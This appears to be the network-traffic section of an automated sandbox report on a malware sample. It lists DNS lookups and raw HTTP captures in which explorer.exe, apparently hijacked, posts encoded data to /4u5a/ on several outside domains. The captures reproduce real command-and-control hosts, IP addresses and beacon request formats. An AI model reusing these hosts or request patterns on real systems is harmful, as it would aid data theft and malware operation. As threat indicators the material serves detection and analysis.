                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 29, 2022 18:25:06.849574089 CET8.8.8.8192.168.2.60x2214No error (0)www.ope-cctv.com38.55.236.89A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:12.532123089 CET8.8.8.8192.168.2.60x7524No error (0)www.dersameh.com89.31.143.1A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:21.755763054 CET8.8.8.8192.168.2.60x2444No error (0)www.darkchocolatebliss.com54.38.220.85A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:31.068085909 CET8.8.8.8192.168.2.60xa02aNo error (0)www.y31jaihdb6zm87.buzz154.209.6.241A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:50.808146954 CET8.8.8.8192.168.2.60xeb7dNo error (0)www.marketmall.digital162.213.255.142A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.772579908 CET8.8.8.8192.168.2.60xd179No error (0)www.canadianlocalbusiness.com172.67.148.132A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.772579908 CET8.8.8.8192.168.2.60xd179No error (0)www.canadianlocalbusiness.com104.21.29.63A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.ope-cctv.com
                                        • www.dersameh.com
                                        • www.darkchocolatebliss.com
                                        • www.y31jaihdb6zm87.buzz
                                        • www.marketmall.digital
                                        • www.canadianlocalbusiness.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.64971438.55.236.8980C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:07.177280903 CET118OUTGET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1
                                        Host: www.ope-cctv.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:07.496047974 CET119INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:25:07 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.64971589.31.143.180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:12.554054976 CET120OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.dersameh.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.dersameh.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
                                        Nov 29, 2022 18:25:12.576395035 CET120INHTTP/1.1 405 Not Allowed
                                        Date: Tue, 29 Nov 2022 17:25:12 GMT
                                        Content-Type: text/html
                                        Content-Length: 150
                                        Connection: close
                                        Server: UD Forwarding 3.1
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.649724162.213.255.14280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:50.991030931 CET145OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.marketmall.digital
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.marketmall.digital/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 56 72 6c 6a 58 30 75 59 78 51 47 67 68 65 38 55 35 62 35 6e 4e 78 7e 50 47 6e 53 62 67 63 4c 57 44 4f 6f 73 68 59 53 37 67 35 48 6a 4f 35 76 6e 77 32 67 62 70 43 31 7a 58 50 49 72 4a 49 57 52 74 4a 44 68 34 72 56 4b 53 6a 75 55 78 6f 28 45 50 48 7e 52 4b 65 65 34 77 4b 44 37 77 6a 33 78 69 31 6b 4e 63 66 4c 72 68 63 65 44 74 72 37 36 57 31 61 6b 4c 31 77 67 37 77 6f 4f 61 58 46 57 6a 6b 36 73 64 2d 36 45 39 32 43 49 42 2d 4d 77 72 2d 53 36 76 4e 76 6c 76 4b 51 77 53 78 52 44 45 76 45 39 4a 57 46 32 61 36 6f 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: l0GX=z1yV~d~FGj03VrljX0uYxQGghe8U5b5nNx~PGnSbgcLWDOoshYS7g5HjO5vnw2gbpC1zXPIrJIWRtJDh4rVKSjuUxo(EPH~RKee4wKD7wj3xi1kNcfLrhceDtr76W1akL1wg7woOaXFWjk6sd-6E92CIB-Mwr-S6vNvlvKQwSxRDEvE9JWF2a6o.
                                        Nov 29, 2022 18:25:51.284145117 CET147INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:51 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.649725162.213.255.14280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:53.235179901 CET149OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.marketmall.digital
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.marketmall.digital/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 55 4f 74 6a 62 33 57 59 6b 67 47 6a 74 2d 38 55 7a 37 35 6a 4e 78 69 50 47 69 72 65 68 76 6e 57 44 63 41 73 67 36 36 37 69 35 48 6a 49 35 76 6a 75 47 67 7a 70 43 68 56 58 4b 6b 37 4a 4b 61 52 75 71 37 68 7e 76 31 4a 5a 7a 75 57 6d 34 28 48 50 48 28 4a 4b 65 4f 38 77 4b 57 67 77 6a 28 78 69 48 4d 4e 4d 5f 4c 6f 38 73 65 44 74 72 36 6f 57 31 61 49 4c 78 63 6f 37 78 41 65 5a 6d 31 57 6a 41 75 73 62 70 57 62 37 32 43 4d 49 65 4e 46 67 2d 76 6c 6b 65 36 31 71 37 49 43 42 77 4a 41 49 38 35 35 5a 6c 51 31 50 50 70 6e 35 2d 78 33 31 46 53 32 64 63 4f 5a 7a 42 6d 74 56 6b 70 6d 50 67 4f 63 5a 75 7e 4a 58 6f 58 57 77 74 73 32 7e 73 37 53 69 66 7e 74 36 4a 42 4e 62 6b 65 6b 4f 6f 5a 61 55 55 71 54 71 66 70 68 54 32 63 50 65 4c 47 43 66 51 6c 77 65 7a 49 75 34 6f 66 50 50 79 65 48 5a 37 78 5a 42 46 67 30 65 2d 59 44 30 6d 54 5a 4f 54 50 68 42 32 33 78 71 48 34 4a 55 34 53 7a 42 7a 78 61 69 73 41 47 7a 6f 55 66 45 6a 28 52 6b 32 56 41 31 59 4b 52 32 56 7a 68 50 6a 6b 6b 74 43 44 72 78 4c 5a 32 76 78 7a 74 51 53 63 74 65 42 5a 45 57 59 6a 65 37 69 55 71 67 73 52 4d 42 51 7e 46 33 33 48 50 49 6b 32 38 6f 30 71 55 31 64 4c 54 69 6b 42 52 61 54 56 6c 36 74 35 48 39 77 54 59 71 59 74 38 65 69 46 6d 6a 33 75 41 4a 67 37 35 43 37 34 35 73 39 33 30 76 46 4b 51 5a 70 59 59 59 42 48 4c 30 65 46 34 52 44 36 51 55 65 75 33 38 79 50 32 6e 6a 45 74 48 51 47 33 76 56 77 77 7e 30 70 5f 6b 6f 55 58 65 54 52 62 47 55 55 54 64 70 53 47 58 4f 70 70 79 61 78 68 4d 58 4b 6c 61 65 77 4a 6b 68 7e 4d 56 70 50 4c 70 41 55 58 37 4b 6f 6b 75 31 47 65 32 42 48 52 39 5f 76 74 61 59 67 6b 65 74 28 5f 52 76 46 52 4d 52 70 64 62 4e 4a 57 47 70 61 6f 30 33 37 6e 79 43 64 57 4c 32 71 75 4b 30 79 4d 57 36 34 6f 61 42 6d 65 44 43 34 34 49 39 44 46 77 39 4f 6c 62 62 67 57 34 47 6d 2d 32 65 70 78 62 32 54 5a 4b 32 28 67 72 76 6e 30 68 48 31 69 6b 72 70 34 47 48 44 73 58 4d 57 52 31 68 68 57 32 55 7a 55 31 45 57 63 36 35 75 6c 70 36 32 4b 32 4f 75 7a 4b 4a 34 46 77 57 28 51 51 41 61 4f 7e 56 44 45 48 73 78 4a 34 43 6d 38 38 35 6a 64 72 4e 58 4c 6e 50 6f 46 31 33 52 5a 53 6b 33 62 51 4b 67 4e 64 4f 79 4c 35 71 53 49 6d 49 35 75 72 61 71 6d 5a 54 46 70 54 48 53 57 38 58 59 43 76 37 73 37 71 6a 31 37 75 75 30 75 79 70 38 49 58 6f 52 43 6d 36 28 6c 7a 4f 47 59 28 34 49 6a 6a 36 71 4b 52 5f 6f 51 74 66 33 41 6b 62 4a 33 77 6b 56 55 4f 6d 45 68 37 6f 57 48 33 61 78 73 55 31 47 64 37 46 73 39 68 45 56 33 63 54 32 33 36 75 41 53 37 5f 33 53 64 49 67 42 6c 6d 67 52 4b 46 63 42 28 76 79 73 53 33 6d 4f 7e 6c 57 6d 59 52 58 33 62 37 58 75 4a 48 71 65 46 57 39 33 38 66 44 52 34 6f 59 73 7e 75 4d 6f 74 55 6f 7a 72 67 6f 66 4c 47 7e 32 49 39 43 31 78 66 6a 79 56 66 50 74 7e 53 6c 77 38 63 52 48 38 43 78 50 4e 76 30 6b 34 33 44 57 45 46 56 5a 52 69 79 7a 30 35 67 4e 70 52 73 4e 5a 45 36 43 50 6f 6a 64 61 75 4e 72 77 46 48 37 47 41 48 68 6a 62 33 4c 42 7a 44 58 6d 70 77 4c 66 55 36 68 54 30 70 39 72 66 39 4c 77 51 52 6c 58 32 6d 52 79 6e 4f 73 41 54 71 6e 70 35 28 5a 43 78 32 70 46 4e 4f 51 38 46 69 49 6e 70 68 67 52 69 6c 65 62 48 31 4b 43 36 33 75 62 49 6a 70 4d 30 72 57 73 64 4d 4c 28 6a 41 62 44 45 4e 52 46 73 57 51 71 6e 7a 38 6f 43 79 6f 32 46 4c 5f 70 32 62 52 77 6b 57 5a 66 31 63 79 69 53 37 45 61 62 51 4a 57 7a 42 4f 77 65 42 55 76 44 6d 69 77 53 66 38 30 62 72 55 68 47 64 72 30 31 33 76 38 39 56 64 47 78 43 4e 66 35 64 4a 7a 52 6b 64 44 76 42 70 6a 32 58 42 30 36 56 76 44 35 33 44 4a 30 37 51 38 75 46 44 56 73 47 47 43 46 72 4d 57 6d 63 37 54 4c 47 2d 4a 76 36 37 41 59 55 33 35 6d 6e 6e 62 70 45 69 35 33 31 56 36 59 4b 58 49 54 6c 6d 39 61 34 55 4b 62 50 6b 54 56 39 42 79 55 6c 78 64 77 70 63 61 58 4a 73 45 4d 34 6d 34 39 7a 68 31 67 6c 76 57 4f 59 5a 4f 53 54 34 46 35 4c 54 4d 38 68 6e 4a 30 62 4e 4d 4e 6d 5a 54 47 6b 31 42 78 53 59 77 6a 63 41 35 63 74 37 33 38 36 57 36 76 74 2d 65 31 7e 37 6e 4d 72 37 55 71 6b 42 7a 79 64 30 73 34 4d 79 41 4e 58 48 75 48 62 75 41 62 4b 33 74 5f 34 4c 43 54 36 58 6a 43 6e 41 66 75 70 77 6c 46 72 55 48 6b 37 4a 34 6b 51 6b 36 6b 4e 42 30 6c 4c 6f 75 4f 28 5a 49 69 6e 67 33 33 48 65 71 7a
                                        Data Ascii: l0GX=z1yV~d~FGj03UOtjb3WYkgGjt-8Uz75jNxiPGirehvnWDcAsg667i5HjI5vjuGgzpChVXKk7JKaRuq7h~v1JZzuWm4(HPH(JKeO8wKWgwj(xiHMNM_Lo8seDtr6oW1aILxco7xAeZm1WjAusbpWb72CMIeNFg-vlke61q7ICBwJAI855ZlQ1PPpn5-x31FS2dcOZzBmtVkpmPgOcZu~JXoXWwts2~s7Sif~t6JBNbkekOoZaUUqTqfphT2cPeLGCfQlwezIu4ofPPyeHZ7xZBFg0e-YD0mTZOTPhB23xqH4JU4SzBzxaisAGzoUfEj(Rk2VA1YKR2VzhPjkktCDrxLZ2vxztQScteBZEWYje7iUqgsRMBQ~F33HPIk28o0qU1dLTikBRaTVl6t5H9wTYqYt8eiFmj3uAJg75C745s930vFKQZpYYYBHL0eF4RD6QUeu38yP2njEtHQG3vVww~0p_koUXeTRbGUUTdpSGXOppyaxhMXKlaewJkh~MVpPLpAUX7Koku1Ge2BHR9_vtaYgket(_RvFRMRpdbNJWGpao037nyCdWL2quK0yMW64oaBmeDC44I9DFw9OlbbgW4Gm-2epxb2TZK2(grvn0hH1ikrp4GHDsXMWR1hhW2UzU1EWc65ulp62K2OuzKJ4FwW(QQAaO~VDEHsxJ4Cm885jdrNXLnPoF13RZSk3bQKgNdOyL5qSImI5uraqmZTFpTHSW8XYCv7s7qj17uu0uyp8IXoRCm6(lzOGY(4Ijj6qKR_oQtf3AkbJ3wkVUOmEh7oWH3axsU1Gd7Fs9hEV3cT236uAS7_3SdIgBlmgRKFcB(vysS3mO~lWmYRX3b7XuJHqeFW938fDR4oYs~uMotUozrgofLG~2I9C1xfjyVfPt~Slw8cRH8CxPNv0k43DWEFVZRiyz05gNpRsNZE6CPojdauNrwFH7GAHhjb3LBzDXmpwLfU6hT0p9rf9LwQRlX2mRynOsATqnp5(ZCx2pFNOQ8FiInphgRilebH1KC63ubIjpM0rWsdML(jAbDENRFsWQqnz8oCyo2FL_p2bRwkWZf1cyiS7EabQJWzBOweBUvDmiwSf80brUhGdr013v89VdGxCNf5dJzRkdDvBpj2XB06VvD53DJ07Q8uFDVsGGCFrMWmc7TLG-Jv67AYU35mnnbpEi531V6YKXITlm9a4UKbPkTV9ByUlxdwpcaXJsEM4m49zh1glvWOYZOST4F5LTM8hnJ0bNMNmZTGk1BxSYwjcA5ct7386W6vt-e1~7nMr7UqkBzyd0s4MyANXHuHbuAbK3t_4LCT6XjCnAfupwlFrUHk7J4kQk6kNB0lLouO(ZIing33HeqzzY13HLGCtPBU(anoFTVr8TjarJU7go3C4gHhVrfqf8KqtdqK(jLwbtrMCDFURmtU(19gOlcUGp(22vxGWVgwPGP1s.
                                        Nov 29, 2022 18:25:53.524674892 CET150INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:53 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
